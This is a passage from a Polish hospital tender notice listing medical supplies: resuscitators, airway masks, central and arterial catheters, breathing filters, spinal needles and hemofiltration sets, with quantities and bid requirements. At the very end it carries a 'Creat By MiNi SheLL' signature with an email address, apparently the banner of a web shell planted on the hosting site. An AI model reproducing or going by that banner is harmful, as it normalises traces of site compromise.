11	Resuscytator dla dorosłych, maska twarzowa nr 5 z pompowanym mankietem, rezerwuar tlenu,  przeznaczony do wielokrotnej sterylizacji w autoklawie (do 134 C, włącznie z maską i rezerwuarem tlenu), maksymalna objętość wdechu ok.1300ml, podwójny worek ograniczający ciśnienie wdmuchiwanego powietrza,  worek wewnętrzny wykonany z silikonu, worek zewnętrzny wykonany z silikonu	2	szt
12	Zawór pacjenta kompatybilny z w/w resuscytatorem	4	szt
13	Resuscytator dla dorosłych	6	szt
14	Resuscytator dla dzieci	2	szt
15	Resuscytator dla noworodków	3	szt
16	Anestetyczny worek oddechowy z dziurką /bez dziurki wielorazowego użytku silikonowy 1500ml i 2300ml	2	szt
17	Maska anestetyczna jednorazowa, z pompowanym kołnierzem z zaworem, kształt anatomiczny, materiał PCV rozm. 0; 1; 2	30	szt
18	Maska anestetyczna jednorazowa, z pompowanym kołnierzem z zaworem, kształt anatomiczny, materiał PCV rozm.3; 4;  5	2000	szt
19	Maska krtaniowa jednorazowego użytku rurka maski wygięta pod kątem odpowiadającym budowie anatomicznej gardła około 70 stopni , mankiet pozbawiony nierówności i ostrych krawędzi , koniuszek mankietu wzmocniony co zabezpiecza przed jego zagięciem i niewłaściwym ułożeniem . Informacje dotyczące rozmiaru, wagi pacjenta, objętości wypełnienia mankietu umieszczone na baloniku kontrolnym. Znaczniki prawidłowego usytuowania maski na rurce, sterylna. Rozmiary od 1,0 do 6,0	6	szt
20	Maska krtaniowa wielorazowego uzytku rozm 1 - 6	3	szt
21	Maska tlenowa z nebulizatorem i drenem dla dzieci - standard lub przedłużony	600	szt
22	Maska tlenowa z nebulizatorem i drenem dla dorosłych - standard lub przedłużonyczy	300	szt
23	Maska tlenowa dla dorosłych z drenem	1600	szt
24	Maska tlenowa dla dzieci z drenem	300	szt
25	Dren do pomiaru KAPNO  3m	20	szt
26	Czujnik jednorazowy, sterylny, nie zawierjący lateksu dla osób po. 30kg, massimo set lnop	10	szt
Wymagania Zamawiającego:
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia. 
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.17.10.00-9, 33.18.15.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3  -  wkłucia centralne, mocowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość	j.m.
1	Nieinwazyjny system mocowania cewników do żył centralnych o anatomicznym, eliptyczny kształcie ze zwęrzeniem w środkowej, adhezyjnej część stabilizującej. Posiadający dwuwarstwowe zabezpieczenie rzepowe Velcro. Produkt hypoalergiczny, bezlateksowy, sterylny, pakowany jednostkowo w opakowanie typu folia/papier z mankietem.	50	szt
2	Nieinwazyjny system mocowania kaniuli dotętniczej z zaworem odcinającym typu Floswitch posiadający dwuwarstwowy fiksator rzepowy Velcro oraz specjalnie wyprofilowaną pod kształt kaniuli adhezyjną część stabilizującą. Produkt hypoalergiczny, bezlateksowy, sterylny, pakowany jednostkowo w opakowanie typu folia/papier z mankietem.	10	szt
3	Kaniula dotętnicza 20G x45 mm	30	szt
4	Cewnik do żyły głównej jednoświatłowy. Zestaw do kaniulacji dużych naczyń metodą Seldingera, jednoświatłowy, zawierający cewnik dł.15 , 20 lub 30 cm              ( do wyboru  ) 7 F , igłę typu V	10	szt,
Wymagania Zamawiającego:
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia.  
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.17.10.00-9, 33.18.15.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - systemy oddechowe, terapia oddechowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość	j.m.
1	Łącznik karbowany prosty, jednorazowy martwa przestrzeń sterylny, opakowanie papierowo-foliowe, średnica 15/22mm	220	szt.
2	Łącznik karbowany elastyczny, rozciągliwy, zespolony z podwójnym obrotowym łącznikiem kątowym, z portem do odsysania, jednorazowy	300	szt
3	Łącznik obrotowy, kątowy z portem do odsysania,  sterylny	100	szt
4	Filtr mechaniczny hydrofobowy, skuteczność filtracji w środowisku wilgotnym: 100%, objętość 35ml, waga 26g, opór przepływu 3,6cm H20/60L/min, czas użycia dla jednego pacjenta 24godz., sterylizowany radiacyjnie	2000	szt
5	Filtr mechaniczny hydrofobowy, skuteczność filtracji w środowisku wilgotnym: 100% (układy oddechowe stosowane w anestezji i I.T.), objętość 85ml, waga 47g, opór przepływu 2cm H20/60L/min, nawilżanie 8mg/L/800ml, czas użycia dla jednego pacjenta 48godz., streylizowany radiacyjnie	1000	szt
6	Filtr oddechowy z wymiennikiem ciepła i wilgoci  dla dzieci 28-29ml antybakteryjny i antywirusowy o małej masie własnej, małej przestrzeni martwej z portem kapno	60	szt
7	Filtr oddechowy z wymiennikiem ciepła i wilgoci  dla noworodków 10-11 ml antybakteryjny i antywirusowy o małej masie własnej, małej przestrzeni martwej z portem kapno	25	szt
8	Wymiennik ciepła i wilgoci	5	szt
9	Obwód oddechowy podgrzewany do nawilżacza aktywnego	2	szt
10	Obwód oddechowy do aparatu do znieczulenia dla dzieci, 2 rury rozciągliwe, dł.po rozciągnięciu 150cm, dodatkowa rura do worka o dł.po rozciągnięciu 90cm, kolanko z portem kapno, trójnik Y z dwoma portami zabezpieczonymi zatyczkami, średnica rur 15mm, złączka prosta 22mm-22mm, bezlateksowy worek oddechowy poj.1 litr,	30	szt
11	Obwód oddechowy do aparatu do znieczulenia dla dorosłych, rury rozciągliwe, dł.po rozciągnięciu 180cm, dodatkowa rura do worka o dł.po rozciągnięciu 90cm, kolanko z portem kapno, trójnik Y z dwoma portami zabezpieczonymi zatyczkami, złączka prosta 22mm-22mm, bezlateksowy worek oddechowy poj.2 litry,	250	szt
12	Obwód oddechowy do respiratora dla dorosłych,  2 rury karbowane o dł. 160 cm z PE (polietylenu), kolanko z portem luer lock, trójnik Y z dwoma portami zabezpieczonych zatyczkami przytwierdzonymi na stałe do obwodu , średnica rur 22mm, złącza 22mmF wykonane z elastycznego EVA (etylenu octanu winylu) które dopasowują się do różnego typu aparatów	400	szt
13	Obwód oddechowy do aparatu do znieczulenia dla dorosłych z maską, rury rozciągliwe, dł.po rozciągnięciu 180cm, dodatkowa rura do worka o dł.po rozciągnięciu 90cm, kolanko z portem kapno, trójnik Y z dwoma portami zabezpieczonymi zatyczkami, złączka prosta 22mm-22mm, bezlateksowy worek oddechowy poj.2 litry,	5	szt
14	Układ oddechowy współosiowy (rura w rurze) o średnicy 30mm, długość układu 160cm, układ zakończony łącznikiem kątowym z portem oraz kapturkiem zabezpieczającym i klipsem do mocowania układu, w zestawie dodatkowa rura 50cm do worka oddechowego oraz tester szczelności układu	15	szt
Wymagania Zamawiającego:
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia. 

2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.17.10.00-9, 33.18.15.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 -  wkłucia centralne, znieczulenia przewodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość	j.m.
1	Cewnik do żyły głównej dwuświatłowy. Zestaw do kaniulacji dużych naczyń metodą Seldingera, dwuświatłowy, zawierający cewnik dł.20 cm 7F o średnicy kanałów 16/16G, igłę typu V (możliwość wprowadzania prowadnicy bez odłączania strzykawki), odporną na zaginanie prowadnicę wykonaną z rdzenia niklowo tytanowego, możliwość kontroli cewnika w trakcie zakładania przy użyciu EKG	10	szt
2	Cewnik do żyły głównej trzyświatłowy. Zestaw do kaniulacji dużych naczyń metodą Seldingera, trzyświatłowy, zawierający cewnik dł.20 cm 7F o średnicy kanałów 16/18/18G, igłę typu V (możliwość wprowadzania prowadnicy bez odłączania strzykawki), odporną na zaginanie prowadnicę wykonaną z rdzenia niklowo tytanowego, możliwość kontroli cewnika w trakcie zakładania przy użyciu EKG	400	szt
3	Cewnik do żyły głównej trzyświatłowy z powłoką antybakteryjną. Zestaw do kaniulacji dużych naczyń metodą Seldingera, trzyświatłowy, zawierający cewnik dł.20 cm 7F o średnicy kanałów 16/18/18G, igłę typu V (możliwość wprowadzania prowadnicy bez odłączania strzykawki), odporną na zaginanie prowadnicę wykonaną z rdzenia niklowo tytanowego, możliwość kontroli cewnika w trakcie zakładania przy użyciu EKG	10	szt
4	Zestaw do znieczuleń zewnątrzoponowych: Igła Touhy rozm. 18G/80mm, z nieruchomymi skrzydełkami, strzykawka niskooporowa, cewnik epiduralny ze znacznikami głębokości, łącznik z bezpiecznym zaciskowym elementem łączącym filtr z cewnikiem zewnątrzoponowym, z samoprzylepnym, zatrzaskowym elementem umożliwiającym bezpieczne umocowanie filtra z cewnikiem do skóry pacjenta	15	szt
5	Igła podpajęczynówkowa ze szlifem Quincke z ergonomicznym  uchwytem zapewniający pewne trzymanie igły i pełną kontrolę podczas przechodzenia przez tkanki oraz zmieniajacy barwę pryzmat  jednoznacznie potwierdzający wprowadzenie igły do przestrzeni podpajeczynówkowej
bez prowadnicy 22G  dł. 88-90mm	100	szt
6	Igła podpajęczynówkowa ze szlifem Quincke  z ergonomicznym  uchwytem zapewniający pewne trzymanie igły i pełną kontrolę podczas przechodzenia przez tkanki oraz zmieniajacy barwę pryzmat  jednoznacznie potwierdzający wprowadzenie igły do przestrzeni podpajeczynówkowej bez prowadnicy 25G  dł. 88-90mm	300	szt
7	Igła podpajęczynówkowa ze szlifem Quincke  z ergonomicznym  uchwytem zapewniający pewne trzymanie igły i pełną kontrolę podczas przechodzenia przez tkanki oraz zmieniajacy barwę pryzmat  jednoznacznie potwierdzający wprowadzenie igły do przestrzeni podpajeczynówkowej bez prowadnicy 26G  dł. 88-90mm	1100	szt
8	Igła podpajęczynówkowa ze szlifem Quincke z ergonomicznym  uchwytem zapewniający pewne trzymanie igły i pełną kontrolę podczas przechodzenia przez tkanki oraz zmieniajacy barwę pryzmat  jednoznacznie potwierdzający wprowadzenie igły do przestrzeni podpajeczynówkowej bez prowadnicy 27G  dł. 88-90mm	50	szt
9	Igła podpajęczynówkowa typu Pencil Point bez prowadnicy 25G  dł. 150-156mm.	25	szt
10	Igła podpajęczynówkowa ze szlifem Quincke  z ergonomicznym  uchwytem zapewniający pewne trzymanie igły i pełną kontrolę podczas przechodzenia przez tkanki oraz zmieniajacy barwę pryzmat  jednoznacznie potwierdzający wprowadzenie igły do przestrzeni podpajeczynówkowej bez prowadnicy 26G  dł. 120-122mm	25	szt
11	Igła podpajęczynówkowa typu Pencil Point 22G dł 88-90mm	25	szt
12	Igła podpajęczynówkowa typu Pencil Point z prowadnicą 25G dł 88-90mm	25	szt
13	Igła podpajęczynówkowa z atraumatycznym dwustrefowym szlifem z prowadnicą 26G dł 88mm	50	szt
14	Igła podpajęczynówkowa typu Pencil Point  z prowadnicą 27G dł 88-90mm	220	szt
15	Igła podpajęczynówkowa ze szlifem Quincke z prowadnicą 29G dł. 88-90mm	25	szt
16	Prowadnica do igiel podpajeczynowkowych dl 35 mm sr 0,70mm	50	szt
17	Prowadnica do igiel podpajeczynowkowych dl 35 mm sr 0,90mm	50	szt
Wymagania Zamawiającego:
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia. 
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.17.10.00-9, 33.18.15.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6  -  mocowania rurek intubacyjnych, tracheotomijnych, kończyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Asortyment	Ilość	j.m.
1	Jednoczęściowe mocowanie dla zabezpieczenia rurek tracheotomijnych. Bezlateksowe, bez zastosowania klejów, hipoalergiczne, neutralne dla bakterii, chłonne, antyodleżynowe, możliwość stosowania przy naświetlaniach, stabilne, możliwość sterylizacji parowej. Z zapięciem rzepowym.	10	szt
2	Mocowanie rurek tracheotomijnych lub masek tlenowych , wykonane z elastycznej taśmy z możliwością regulacji długości , zakończonej haczykami do mocowania.	10	szt
3	Opatrunek absorbujący wydzielinę , wykonany z hydrofilnej pianki  poliuretanowej, która bardzo dobrze amortyzuje, zabezpiecza przed przesunięciem rurki tracheotomijnej. Wierzchnia warstwa wykonana w kolorze skóry, półprzepuszczalna nie posiada kleju ani lateksu posiada zygzakowate nacięcie, które zapobiega wysuwaniu się rurki tracheotomijnej. Opatrunek pozwala na wymianę gazów.Rozmiar 8,2x9,5 cm.	40	szt
4	Stabilizator do rurki intubacyjnej dwuczęściowy z możliwością regulacji, łączony na rzep. Środkowa część stabilizatora pokryta silikonem, który w pewny sposób stabilizuje rurkę.	10	szt
5	Opaska mocująca ręce lub stopy stosowana do samochrony pacjentów, wykonana z miękkiego materiału, zapinana na rzep z zintegrowanym uchwytem do mocowania dołączonej tasiemki o dł. 150 cm - 1 opakowanie - 2 opaski. + tasiemki mocujące .	30	kpl.
Wymagania Zamawiającego
1. ad poz. 1;2;4;5  wymagana możliwość sterylizacji parowej. 
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia. 
3. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.17.10.00-9, 33.18.15.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7  - monitorowanie ciśnienia metodą inwazyjną.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość
1	Przetwornik do  inwazyjnego  pomiaru  ciśnienia   - pojedynczy                                            
Zestaw  wyposażony  w  igłę  zakrzywioną  w  zbiorniku  wyrównawczym ,   w  dwie  możliwości  przepłukiwania  (aktywne  skrzydełka  i  gumowa  wypustka), długość  całkowita  linii 150  cm ,  2 kraniki  trójdrożne , niezdejmowalny koreczek  kalibracyjny . Częstotliwość pracy własnej powyżej 1200 Hz.
Połączenie  z  kablem  interfejsowym -  wodoszczelne - pinowe.	40
2	Przetwornik do  inwazyjnego  pomiaru  ciśnienia - pojedynczy z układemdo pobierania próbek krwi  w systemie zamkniętym                                                                                        
Zestaw  wyposażony  w  igłę  zakrzywioną  w  zbiorniku  wyrównawczym ,   w  dwie możliwości  przepłukiwania  (aktywne  skrzydełka  i  gumowa  wypustka), port bezigłowy
do pobierania próbek krwi (podzielna membrana  silikonowa na  linii  pacjent - przetwornik ),strzykawka do  aspiracji o  poj 5ml  , z  zabezpieczonym  przez  osłonkę   silikonową tłokiem. 
Częstotliwość pracy własnej powyżej 1200 Hz.
Połączenie  z  kablem  interfejsowym -  wodoszczelne - pinowe.	10
3	Cewnik do tętnicy udowej - jednoświatłowy ( metoda Seldingera )                          4 Fr x 200 mm , prowadnica igłowa 17 G x 70 mm , drut prowadzący 0,6 x 450 mm.	2
4	Cewnik do tętnicy promieniowej - jednoświatłowy ( metoda Seldingera ) 3 Fr x 60 mm , prowadnica igłowa 20 G x 40 mm , drut prowadzący 0,5 x 250 mm.	10

Wymagania Zamawiającego									
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia w celu weryfikacji zgodności oferowanego produktu
z opisem przedmiotu zamówienia w SIWZ.  

2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.17.10.00-9, 33.18.15.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8  - Zestaw do hemofiltracji,  wkłucia dializacyjne do aparatu AQUARIUS Platinum wersja 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość	j.m.
1	Zestaw HF12 + linie do aparatu Aquarius	20	szt
2	Aquaspike	20	szt
3	Worki drenażowe	90	szt
4	Infusion spikes	200	szt
5	Cewnik 11 FR dł.15, 20 i 24 cm	20	szt
6	Plasmafiltr 05 SQM	10	szt
7	Plasmafiltr 07 SQM	10	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.17.10.00-9, 33.18.15.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet 9 - Przyrząd do żywienia dojelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Opis produktu	Ilość	j.m
1	Jałowy zestaw serwet i komponentów o składzie: 

1 x serweta na stolik narzędziowy nieprzylepna 120 x 95 cm (owinięcie zestawu); 
1 x serweta chirurgiczna 150 x 100 cm z samoprzylepnym                                                                               otworem o śr. 10 cm umieszczonym decentralnie; serweta powinna posiadać naklejony piktogram ułatwiający jej prawidłowe użycie; 
1 x kleszczyki plastikowe niebieskie typu korcang do mycia pola 19 cm; 
1 x imadło chirurgiczne jedorazowe stalowe typu Mayo-Hegar 12 cm;  
1 x opatrunek mocujący przeźroczysty, samoprzylepny 10 x 14 cm; 
1 x miseczka plastikowa z podziałką 120 ml, transparentna; 
5 x kompres z włókniny 7,5 x 7,5 cm, 30g/mkw; 
1 x obcinacz do szwów zakrzywiony, jednorazowy, ok. 9,3 cm, w całości wykonany z metalu, bezpiecznie pakowany w osobny blister; 
3 x tupfer z gazy 24 x 24 cm, 20 nitek; 
1 x fartuch chirurgiczny rozmiar L, typu open-back;                                         1 x strzykawka typu luer, 2-częściowa, 10 ml; 	zest.	70
Wymagania do poz.1 		
1. Serwety wykonane z dwuwarstwowej pełnobarierowej włókniny (zgodnej z EN 13795 1,2,3) o gramaturze min. 54 g/mkw. 
2. Fartuch pełnobarierowy wykonany z materiału typu SMMS o gramaturze min. 40 g/mkw. Rękawy zakończone elastycznym mankietem z dzianiny. Fartuch wiązany na troki.                                                                                                                                                                                                Szwy wykonane techniką ultradźwiękową. Długość fartucha 125 cm.  
3. Zestaw umieszczony w opakowaniu folia-papier, bezpiecznie pakowany do transportu. Każdy zestaw powinien posiadać 2  naklejki do dokumentacji zawierające datę ważności oraz numer serii  ( część tradycyjna i kod kreskowy). Małe elementy w zestawie powinny być dodatkowo zabezpieczone np. poprzez umieszczenie ich w papierowych torebkach.  
4. Imadło wykonane ze stali, matowo wykończone, powinno posiadać zgodnie z normą EN 980 symbol jednorazowości umieszczony w sposób trwały po obu stronach 
narzędzia. Wyrób zgodny z dyrektywą UE 93/42/EWG. Wyrób medyczny klasa IIa reguła 6. 
5. Sterylizacja zestawu tlenkiem etylenu.Wymagany dokument walidacji procesu sterylizacji 
Wymagania Zamawiającego:		
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.  
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.17.10.00-9, 33.18.15.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet 9 - Przyrząd do żywienia dojelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość	j.m.
1	Zawór zamykający dostępu naczyniowego, bezigłowy, kompatybilny z połączeniem typu Luer Lok i Luer, posiadający podzielną silikonową membranę idealnie gładką i jednorodną, posiadający jednorodną powierzchnię do dezynfekcji, prosty tor przepływu, bez elementów lub mechanizmów wewnętrznych, pracujący w systemie zamkniętym, posiadający przezroczystą obudowę, pakowany pojedyńczo, sterylny, jednorazowego użytku, wolny od PCV i lateksu, czas stosowania 7dni	2500	szt
2	Zestaw do odsysania pola operacyjnego Yankauer  bez kulki , dren z możliwością przycięcia łącznika w specjalnie oznaczonych miejscach i dopasowania do różnego typu ssaków, wzcacniany wzdłużnie, z kontrolią odsysania, długość min.300cm, podwójnie pakowane	500	szt
3	Podwójny zestaw przedłużający z bezigłowym zaworem dostępu naczyniowego z podwójnym przedłużaczem o dł.min.15 cm	10	szt
4	Potrójny zestaw przedłużający z bezigłowym zaworem dostępu naczyniowego z podwójnym przedłużaczem o długości min. 15 cm	500	szt
5	Ostrza chirurgiczne sterylne rozm.10 -25 a 100szt.	60	op.
6	Rampa trójdrożna z końcówkami Luer-Lok j.uż.	20	szt
7	Rampa pięciodrożna z końcówkami Luer-Lok j.uż.	80	szt
8	Zestaw do terapii CPAP zawierajacy kaniulę nosową, 2 dreny karbowane, 2 łączniki kolankowe, dren do tlenu przeźroczysty, czapeczkę + rzep,  rozm. 0,1,2,3	2	op.
9	Woda do systemu RESpiflo 500 ml  9/16	600	szt
10	Woda do systemu RESpiflo 325 ml  9/16	60	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.17.10.00-9, 33.18.15.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com